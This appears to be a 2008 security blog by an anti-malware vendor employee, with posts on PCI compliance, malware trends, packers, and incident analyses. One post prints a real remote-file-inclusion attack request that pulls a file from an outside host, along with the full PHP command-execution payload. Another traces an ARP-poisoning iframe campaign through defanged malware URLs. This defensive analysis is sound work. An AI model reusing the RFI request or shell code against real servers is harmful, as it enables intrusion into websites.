Photo: tricky ™ on Flickr.

Found an interesting article by Martin McKeay through “Security Bloggers Network” which discusses PCI compliance and the implications of hosting applications and data in the cloud.

He boils everything down to one simple point; If you store/transmit/handle cardholder data in a service provider’s network, that network becomes part of the cardholder data environment and needs to be PCI compliant:

“So I made several comments on the post, most of which boil down to referencing PCI requirement 12.8: If you’re sharing cardholder information, i.e. credit card numbers, with a third party service provider, you need to have a clause in your contract that makes the service provider responsible for the PCI compliance of their systems. With the example given, Amazon’s EC2, the chances of getting such a clause in your contract are almost non-existent.”

A subject similar to this has been of interest for me before as Panda MalwareRadar is a cloud service where files deemed interesting are ‘fingerprinted’. Those fingerprints are then communicated to our Collective Intelligence servers in order to be analyzed deeper. For more info on CI, see this whitepaper by Panda Research.

In other words no complete files ever leave the client’s network, but some clients that are in the process of becoming PCI compliant are unsure of what implications services such as this might have. Their general feeling is that they aren’t 100% comfortable handing out fingerprints of possibly malicious processes or files, as it might (theoretically at least) be a false positive. This will lead to unforeseen information disclosure to a third party (PandaLabs and CI servers). We also do inventory of the current patchstatus with the same tool and the same thing goes for that.

I trust our systems with the information gathered, but I understand their position as well as they have to be able to prove compliance. But is there any need to worry?

It all seems to come down to two questions; “Can you trust your security vendor?” and “What requirements in PCI DSS might be implicated by this type of services?”.

Personally I think that some level of trust must exist between a security vendor and their customers so for me the answer to the first one is Yes. Many security products and services are placed in such sensitive locations that it would be impossible to use them otherwise (not only talking about anti-malware here).

I’m unsure about the second one though and would appreciate any comments on this. From what I’ve been able to find information on, there really shouldn’t be any problems. The one thing that might be troubling is the patchstatus information, but the information sent can be anonymized to not include data such as computernames or IP-adresses so that you only get an overview of the current situation (same goes for the malware detections).

Any PCI DSS experts that feel like commenting on what their experiences are with Collective- or Herd-intelligence technologies and services such as this?

EDITED TO ADD: Mike at Aegenis comments below and recommends reading his follow-up post.

The debate on what internet security would look like in the year 2020 at Internetdagarna ‘08 made me think.

What will the malware landscape look like in 12 years?

Well, if we look at our history it’s quite hard to see a larger trend as our selection really doesn’t range that long back. Viruses and worms has been present ever since people started networking computers, and some ever longer. However, there has always been a very opportunistic area and the “bad guys” has adapted quite easily to the different challenges we’ve put them up to.

Previously the attacks were almost always aimed at being large scale and make as much noise as possible. We had the CIH virus, Loveletter, Melissa, Blaster, Sasser and so on. This type of malware did a lot of damage, caused a lot of headache, made people cry over lost images and cost companies millions of hours in overtime.

But still no one was really hurt. There wasn’t any money missing and everyone kept their identity for themselves. The game was more or less “See mee! PLZ!” and “1′m 4 b3773r VX-coder than you, mother*beep*, our cr3w rule the w0rld!!!1!!!“. Media attention was the holy grail.

This has changed though.

Some years ago (~5 yrs?) we started seeing targeted, financially motivated, malware and organizations that profited from these directly. Back then the malware authors were still learning and a lot of mistakes could be observed. We may have laughed at their worms that had bugs earlier but today it’s not that funny. They’ve learnt from their mistakes and today their cashflow enables them to do real Quality Assurance on their code.

Today almost all types of malware circulating is financially motivated in one way or another. They are adapting their methods of infection and follow world and market trends to identify the times at which hard distribution is most effective.

As my colleague Sebastian Zabala puts it; “For them it’s ‘Money talks and bullshit walks‘“. In other words, if it does not generate immediate cash return it is not the least interesting and terms as ARPIU (Average Revenue Per Infected User) are being used. This has been the single most dominant motivator for the malware evolution that we’ve seen in the past couple of years.

Several prominent groups has been mapped over the last four-five years, and one of them is the notorious Russian Business Network. They seem to have relocated now, but at one point last year (2007) a very large portion of the malware being distributed was coming from their network. This is probably the same now but from other, more separated, locations that isn’t as easily distinguished.

The methods of distribution was previously very direct and the bad guys were satisfied with the distribution method of one host infecting another but this has also changed a lot. Much of this change is probably motivated by their need to continuosly modify the malware to keep as much code as possible out of AV-vendors signature files. Today, a very large percent of infection happens through web browsers that get exploited by trusted websites. These websites has been hacked in one way or another in order to add HTML that loads malicious code through invisible iframe’s or scripts.

These attacks are made possible by insecure server-side code which enables attackers to do SQL injections for example. We are also starting to see signs of social networking applications being exploited for the same purpose and a possible method of infection here is XSS (Cross-site scripting). There’s a myriad of different attacks on the same theme, but it’s the same thing here really, insecure server-side code with a twist making the client essential. All in the true spirit of Web 2.0.

But the method of infection really isn’t that important. There will always be vulnerabilities waiting to be exploited. If not in insecure code, then in user behavior. Just look at the latest waves of fake security products. These often use social engineering to get installed on it’s victims computers, such as faking a windows desktop and tricking the user to click OK or taking other actions to install the malware. These applications alone are estimated to bring in multi-million numbers to the guys behind them this year.

A couple of years back, malware on the windows platform also started to come packed with rootkits and other methods of concealment. These technologies has been more widely deployed during the last year and we are seeing them being used in layers. For example, the droppers that first reach the systems often do not come with rootkit functionality but load (injects dll’s) themselves into system processes in order to stay hidden. The malicious software pack that is later downloaded more often than not come with real rootkits often in the form of system drivers. My guess is that this is meant to make users believe that once they’ve managed to clean out the malware they are in the clear, but only hours later the dropper sucks down another pack of crap and installs it.

From our (AV-vendors) point of view we are seeing steep increases in the number of samples (different versions of the same malware) being distributed and to cope with this problem we are inventing different technologies that either make our signature less important or help us analyze samples. For example Panda has TruPrevent for behavioral analysis and Collective Intelligence for malware identification and faster analysis.

This race will continue. When we establish an effective countermeasure to their latest move, they will change their business model or malware structure. When they do so, we will change our take on the problem.

So… What will the malware scene look like in 12 years?

Well, I don’t really know… I don’t think anyone really knows.

As technology evolves so will the parasitic creatures that feed upon it. My guess is that the malware will be more user tied and that more of the malicious code will be built upon pre-built frameworks that enable faster development. Maybe this already exist?

The Storm botnet that followed us from 2007 into 2008 and still is alive and well is a good example of what the future will have in store. The malicious code relies heavily on social engineering for distribution and installation, and the underlying structure is both stable and agile. They use fast DNS fluxing and double-fluxing in order to keep it alive and also varies communications method between IRC, P2P (eDonkey) and HTTP.

I’m not saying we’ll see more of the same, but rather more malware being based on the same thoughts; Great stability, Good control, Improved anonymity and excellent networking.

Platform independence will probably become more and more important for malicious software as well, as the array of different units used to access the internet is getting bigger every day. By platform I mean both hardware and software.

The challenge for us anti-malware vendors is to keep up. How we’ll be doing that is based on future experiences but in an ideal situation we come as close as we can to a silver bullet for every new twist that the bad guys throw at us. Our real challenge here is to be equally adaptable to new situations as they are. We need to be able to react quickly and hard without impacting the stability of our customers it-systems.

I also think that the user knowledge angle will be more and more important and this will have a big effect on malware distribution. Today I’m seeing younger people just laughing when they stumble upon a strange website and fire up ProcessExplorer to see if something bad happened. This would not have happened five years ago and it changes the way that malware authors have to think.

Hopefully we are up for a cleaner internet tomorrow, but there are no guarantees.

In a worst case scenario the internet might be clogged with garbage, which forces ISPs and national institutions to do filtering in order to isolate the countries that cannot control the organizations behind the malware. This is not something that we want to see and I hope it never goes that far with all of my heart.

Please comment with your thoughts on what the future has in store for us

Cheers,

Warning: Panda Security/work related post.

… this week.

The main news in the 4.03 release is:

* Optimized console performance
* Reduced installation package size
* More auto-uninstallers for competitor products
* Improved update features for mobile users
* Full support for XP SP3 and Vista SP1
* Full support for Exchange 2007 SP1
* Full NAP support in our desktop protections

A lot of other news and bugfixes also included.

Ask you local Panda office for the complete document of changes.

If you’re a client you can download the upgrade here.

Cheers,

Pedro Bustamante, Panda Research writes:

“In our last obfuscation study Packer (r)evolution we saw an increase in the use of private or customized versions of packers being developed to evade AV signature detections. As a curiosity I’ve updated the study to see how this trend is evolving. For this purpose our colleague Satur created a tool called “Detector” for advanced packer identification which specializes on specific, generic and custom packer identification but is also able to identify file infectors, polymorphism, installers and much more. The results are pretty amazing.”

Seems like the bad guys are handling the “threat” from improved heuristics/generic signatures/behavioural analysis with a great deal of agility and style.

Writing customized packers is not something you do over night and you can sense that this is something that the organizations behind has spent some money on…

Out of blog time now, got to go clean up an XP Antivirus 2008 (rouge security app.) infection. That motherf*cker must be repacked 500 times a day… God damned it.

This was just too wonderful

Seems like a laptop used for “dietary schedules” and “occasional e-mail communication back to earth” was infected with the gaming worm/trojan W32.Gammima.AG and then brought onto the International Space Station (ISS).

Found it through Bruce Schneier and more information is here, here and here.

The guys behind this malware must be laughing themselves to pieces

Seriously, who runs the QA at NASA?

“GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.asoc-posidonia.es/pr.txt?? HTTP/1.1″

Looks like someone is trying to exploit a RFI vulnerability in Pearl for Mambo. This particular issue was disclosed over a year ago and they are still scanning for it… Must be a lot of unpatched fish in the internet tubes…

The file that is supposed to be included is live and contains the following:

echo "549821347819481<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."<br>";
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

The attacking host was:

80.237.200.81 (jam.seppenra.de)
Windows CE, Generic Gecko
Cologne, Germany,DE,50.9333,6.95
Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007

What about doing error checking verifying that the target contains vulnerable code? Doesn’t take much time and seems like a reasonable thing to do if you want to stay (at least a little bit) under the radar.

Anyhow, this gave me a good idea which I will present in a future post.

All involved system owners has been notified.

You just don’t see many of these in this day and age. Deleting the files on the C:\ drive and everything

I wonder how long this has been floating around before we picked it up…

… by the bad guys unfortunately

When investigating one of the files that was being downloaded by the initial dropper from the Kirisun hack I found something very interesting. I do not know if this is a known technique, but it is new to me. The file I was looking at was the “24.exe” and the reason for choosing that one were:

1. Easy Self-extracting RAR, no encryption and no sandbox detection.
2. It was one of the largest files == lot’s of goodies?

After running the self-extracting RAR in the sandbox I ended up with the following files in c:\windows\system32\:

Inside the “drivers” folder a copy of npf.sys was dropped. This file belongs to the WinPcap project and so does some of the other files that were extracted.

The file that was supposed to auto start after decompression was “3.vbs” whose only job was to silently run “run.bat” which contained the following two lines:

Ok, then what do our little friend Vml.exe do with these parameters I thought? After asking my friend Google I got the answer that I thought I would get, it was performing ARP poisoning on the local network (well, just the two subnets specified in the .bat) and inserting iframes into all websites being viewed. Previously discovered by CISRT earlier in November.

Genious! One point to the bad guys!

Tracking the iframe’s I found a series of different servers hosting the malware and exploits, the flow is as follows:

• hxxp://boc.sbb22.com/home/index.htm (This is the inserted Iframe)
  • hxxp://boc.sbb22.com/
    • hxxp://aa.llsging.com/ww/new82.htm
      • hxxp://aa.llsging.com/a2/haha.htm
      • hxxp://aa.llsging.com/a2/pps.htm
      • hxxp://js.users.51.la/1299644.js
        • hxxp://vip2.51.la/go.asp
      • hxxp://ww4.tongji123.com/g1.aspx?id=42916235
        • hxxp://ww4.tongji123.com/s.aspx
  • hxxp://nn.mm5208.com/nn.htm
    • Not reachable at the time
  • hxxp://xx.9365.org/
    • hxxp://5.xqhgm.com/sha1.htm
      • hxxp://5.xqhgm.com/new/1.gif (ANI exploit, loads on page).
        • Downloads and runs hxxp://1.xqhgm.com/x.exe
      • hxxp://5.xqhgm.com/new/1.htm (other exploit, not investigated)
        • References hxxp://1.xqhgm.com/x.exe
      • hxxp://5.xqhgm.com/new/2.htm
        • Not reachable at the time
      • hxxp://5.xqhgm.com/new/3.htm
        • Returns empty page
      • hxxp://5.xqhgm.com/new/4.htm
        • Tries to load hxxp://3.xqhgm.com/zs.exe as an object
      • hxxp://s30.cnzz.com/stat.php?id=658703&web_id=658703
        • Seems to be a statistics engine
      • hxxp://js.users.51.la/1402795.js
        • Not reachable at the time
  • hxxp://a.2008yi.com/hu.htm
    • Not reachable at the time
  • hxxp://acc.jqxx.org/ac.htm
    • hxxp://dfs.jfkdlirjnfirpocr.com/web/6619038.htm
      • Not reachable at the time

The primary payload of these iframed pages seems to be “x.exe” and “zs.exe”. When dumping the strings from these executables (no obfuscation used) it becomes apparent that both are droppers for a whole bunch of malware files (possibly the same files, just recompiled/packed/encrypted for AV evasion). The downloads referenced in the files were:

• hxxp://1.xqhgm.com/1.exe
• hxxp://1.xqhgm.com/2.exe
• hxxp://1.xqhgm.com/3.exe
• hxxp://1.xqhgm.com/4.exe
• and so on up to…
• hxxp://1.xqhgm.com/24.exe

File number “1″ and “16″ resulted in a 404 not found.

“23.exe” seems to be the same malware that I found some time back (see this post). As said in that post, the main infector do not want to run in my sandbox. As a cause of that I have not yet been able to get the pcihdd.sys rootkit component as I do not have a computer to “waste time restoring” atm. If someone would like to infect themselves, contact me for a sample

Another thing linking this infection to the other that I found is the use of the same stats engine, hxxp://s30.cnzz.com/.

Cheers and stay safe !